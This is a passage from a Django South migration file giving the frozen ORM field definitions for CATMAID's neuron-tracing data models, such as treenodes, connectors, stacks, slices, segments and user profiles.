'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'recipient': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'change_recipient'", 'db_column': "'recipient_id'", 'to': "orm['auth.User']"}),
'reject_action': ('django.db.models.fields.TextField', [], {}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'treenode': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Treenode']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'validate_action': ('django.db.models.fields.TextField', [], {})
},
'catmaid.class': {
'Meta': {'object_name': 'Class', 'db_table': "'class'"},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.classclass': {
'Meta': {'object_name': 'ClassClass', 'db_table': "'class_class'"},
'class_a': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'classes_a'", 'db_column': "'class_a'", 'to': "orm['catmaid.Class']"}),
'class_b': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'classes_b'", 'db_column': "'class_b'", 'to': "orm['catmaid.Class']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.classinstance': {
'Meta': {'object_name': 'ClassInstance', 'db_table': "'class_instance'"},
'class_column': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Class']", 'db_column': "'class_id'"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.classinstanceclassinstance': {
'Meta': {'object_name': 'ClassInstanceClassInstance', 'db_table': "'class_instance_class_instance'"},
'class_instance_a': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cici_via_a'", 'db_column': "'class_instance_a'", 'to': "orm['catmaid.ClassInstance']"}),
'class_instance_b': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'cici_via_b'", 'db_column': "'class_instance_b'", 'to': "orm['catmaid.ClassInstance']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.concept': {
'Meta': {'object_name': 'Concept', 'db_table': "'concept'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.connector': {
'Meta': {'object_name': 'Connector', 'db_table': "'connector'"},
'confidence': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'connector_editor'", 'db_column': "'editor_id'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'review_time': ('django.db.models.fields.DateTimeField', [], {}),
'reviewer_id': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.connectorclassinstance': {
'Meta': {'object_name': 'ConnectorClassInstance', 'db_table': "'connector_class_instance'"},
'class_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'connector': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Connector']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.constraintstosegmentmap': {
'Meta': {'object_name': 'ConstraintsToSegmentMap'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'origin_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'segments': ('catmaid.fields.IntegerArrayField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'target_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'catmaid.dataview': {
'Meta': {'ordering': "('position',)", 'object_name': 'DataView', 'db_table': "'data_view'"},
'comment': ('django.db.models.fields.TextField', [], {'default': "''", 'null': 'True', 'blank': 'True'}),
'config': ('django.db.models.fields.TextField', [], {'default': "'{}'"}),
'data_view_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.DataViewType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'position': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.dataviewtype': {
'Meta': {'object_name': 'DataViewType', 'db_table': "'data_view_type'"},
'code_type': ('django.db.models.fields.TextField', [], {}),
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.deprecatedappliedmigrations': {
'Meta': {'object_name': 'DeprecatedAppliedMigrations', 'db_table': "'applied_migrations'"},
'id': ('django.db.models.fields.CharField', [], {'max_length': '32', 'primary_key': 'True'})
},
'catmaid.deprecatedsession': {
'Meta': {'object_name': 'DeprecatedSession', 'db_table': "'sessions'"},
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_accessed': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'session_id': ('django.db.models.fields.CharField', [], {'max_length': '26'})
},
'catmaid.drawing': {
'Meta': {'object_name': 'Drawing', 'db_table': "'drawing'"},
'component_id': ('django.db.models.fields.IntegerField', [], {}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_x': ('django.db.models.fields.IntegerField', [], {}),
'max_y': ('django.db.models.fields.IntegerField', [], {}),
'min_x': ('django.db.models.fields.IntegerField', [], {}),
'min_y': ('django.db.models.fields.IntegerField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'skeleton_id': ('django.db.models.fields.IntegerField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'svg': ('django.db.models.fields.TextField', [], {}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'z': ('django.db.models.fields.IntegerField', [], {})
},
'catmaid.location': {
'Meta': {'object_name': 'Location', 'db_table': "'location'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'location_editor'", 'db_column': "'editor_id'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'review_time': ('django.db.models.fields.DateTimeField', [], {}),
'reviewer_id': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.log': {
'Meta': {'object_name': 'Log', 'db_table': "'log'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'freetext': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'operation_type': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.message': {
'Meta': {'object_name': 'Message', 'db_table': "'message'"},
'action': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'read': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'New message'", 'null': 'True', 'blank': 'True'}),
'time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'title': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.overlay': {
'Meta': {'object_name': 'Overlay', 'db_table': "'overlay'"},
'default_opacity': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'file_extension': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_base': ('django.db.models.fields.TextField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'tile_height': ('django.db.models.fields.IntegerField', [], {'default': '512'}),
'tile_source_type': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'tile_width': ('django.db.models.fields.IntegerField', [], {'default': '512'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.project': {
'Meta': {'object_name': 'Project', 'db_table': "'project'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'stacks': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['catmaid.Stack']", 'through': "orm['catmaid.ProjectStack']", 'symmetrical': 'False'}),
'title': ('django.db.models.fields.TextField', [], {})
},
'catmaid.projectstack': {
'Meta': {'object_name': 'ProjectStack', 'db_table': "'project_stack'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'orientation': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'translation': ('catmaid.fields.Double3DField', [], {'default': '(0, 0, 0)'})
},
'catmaid.regionofinterest': {
'Meta': {'object_name': 'RegionOfInterest', 'db_table': "'region_of_interest'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'height': ('django.db.models.fields.FloatField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'rotation_cw': ('django.db.models.fields.FloatField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'width': ('django.db.models.fields.FloatField', [], {}),
'zoom_level': ('django.db.models.fields.IntegerField', [], {})
},
'catmaid.regionofinterestclassinstance': {
'Meta': {'object_name': 'RegionOfInterestClassInstance', 'db_table': "'region_of_interest_class_instance'"},
'class_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'region_of_interest': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.RegionOfInterest']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.relation': {
'Meta': {'object_name': 'Relation', 'db_table': "'relation'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'description': ('django.db.models.fields.TextField', [], {}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isreciprocal': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'uri': ('django.db.models.fields.TextField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.relationinstance': {
'Meta': {'object_name': 'RelationInstance', 'db_table': "'relation_instance'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.restriction': {
'Meta': {'object_name': 'Restriction', 'db_table': "'restriction'"},
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'restricted_link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassClass']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.segments': {
'Meta': {'object_name': 'Segments'},
'assembly': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']", 'null': 'True'}),
'cost': ('django.db.models.fields.FloatField', [], {'db_index': 'True'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'direction': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'origin_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'origin_slice_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'randomforest_cost': ('django.db.models.fields.FloatField', [], {}),
'segmentation_cost': ('django.db.models.fields.FloatField', [], {}),
'segmentid': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'segmenttype': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'}),
'target1_slice_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'target2_slice_id': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'target_section': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.segmenttoconstraintmap': {
'Meta': {'object_name': 'SegmentToConstraintMap'},
'constraint': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ConstraintsToSegmentMap']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'origin_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'segment_node_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'db_index': 'True'}),
'segmentid': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'target_section': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'})
},
'catmaid.settings': {
'Meta': {'object_name': 'Settings', 'db_table': "'settings'"},
'key': ('django.db.models.fields.TextField', [], {'primary_key': 'True'}),
'value': ('django.db.models.fields.TextField', [], {'null': 'True'})
},
'catmaid.slices': {
'Meta': {'object_name': 'Slices'},
'assembly': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']", 'null': 'True'}),
'center_x': ('django.db.models.fields.FloatField', [], {'db_index': 'True'}),
'center_y': ('django.db.models.fields.FloatField', [], {'db_index': 'True'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'flag_left': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'flag_right': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'max_x': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'max_y': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'min_x': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'min_y': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'node_id': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'sectionindex': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'size': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'slice_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"}),
'status': ('django.db.models.fields.IntegerField', [], {'default': '1', 'db_index': 'True'}),
'threshold': ('django.db.models.fields.FloatField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.stack': {
'Meta': {'object_name': 'Stack', 'db_table': "'stack'"},
'comment': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'dimension': ('catmaid.fields.Integer3DField', [], {}),
'file_extension': ('django.db.models.fields.TextField', [], {'default': "'jpg'", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image_base': ('django.db.models.fields.TextField', [], {}),
'metadata': ('django.db.models.fields.TextField', [], {'default': "''", 'blank': 'True'}),
'num_zoom_levels': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'resolution': ('catmaid.fields.Double3DField', [], {}),
'tile_height': ('django.db.models.fields.IntegerField', [], {'default': '256'}),
'tile_source_type': ('django.db.models.fields.IntegerField', [], {'default': '1'}),
'tile_width': ('django.db.models.fields.IntegerField', [], {'default': '256'}),
'title': ('django.db.models.fields.TextField', [], {}),
'trakem2_project': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'catmaid.stacksliceinfo': {
'Meta': {'object_name': 'StackSliceInfo'},
'file_extension': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slice_base_path': ('django.db.models.fields.TextField', [], {}),
'slice_base_url': ('django.db.models.fields.TextField', [], {}),
'stack': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Stack']"})
},
'catmaid.textlabel': {
'Meta': {'object_name': 'Textlabel', 'db_table': "'textlabel'"},
'colour': ('catmaid.fields.RGBAField', [], {'default': '(1, 0.5, 0, 1)'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'font_name': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'font_size': ('django.db.models.fields.FloatField', [], {'default': '32'}),
'font_style': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'scaling': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'text': ('django.db.models.fields.TextField', [], {'default': "'Edit this text ...'"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'catmaid.textlabellocation': {
'Meta': {'object_name': 'TextlabelLocation', 'db_table': "'textlabel_location'"},
'deleted': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'textlabel': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Textlabel']"})
},
'catmaid.treenode': {
'Meta': {'object_name': 'Treenode', 'db_table': "'treenode'"},
'confidence': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'editor': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'treenode_editor'", 'db_column': "'editor_id'", 'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'location': ('catmaid.fields.Double3DField', [], {}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'children'", 'null': 'True', 'to': "orm['catmaid.Treenode']"}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'radius': ('django.db.models.fields.FloatField', [], {}),
'review_time': ('django.db.models.fields.DateTimeField', [], {}),
'reviewer_id': ('django.db.models.fields.IntegerField', [], {'default': '-1'}),
'skeleton': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.treenodeclassinstance': {
'Meta': {'object_name': 'TreenodeClassInstance', 'db_table': "'treenode_class_instance'"},
'class_instance': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'treenode': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Treenode']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.treenodeconnector': {
'Meta': {'object_name': 'TreenodeConnector', 'db_table': "'treenode_connector'"},
'confidence': ('django.db.models.fields.IntegerField', [], {'default': '5'}),
'connector': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Connector']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'edition_time': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Project']"}),
'relation': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Relation']"}),
'skeleton': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.ClassInstance']"}),
'treenode': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['catmaid.Treenode']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'catmaid.userprofile': {
'Meta': {'object_name': 'UserProfile'},
'color': ('catmaid.fields.RGBAField', [], {'default': '(0.9239775287034722, 1.0, 0.9894981201919059, 1)'}),
'display_stack_reference_lines': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'independent_ontology_workspace_is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'inverse_mouse_wheel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_cropping_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_ontology_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_segmentation_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_tagging_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_text_label_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'show_tracing_tool': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'taggit.tag': {
'Meta': {'object_name': 'Tag'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '100'})
},
'taggit.taggeditem': {
'Meta': {'object_name': 'TaggedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'taggit_taggeditem_tagged_items'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.IntegerField', [], {'db_index': 'True'}),
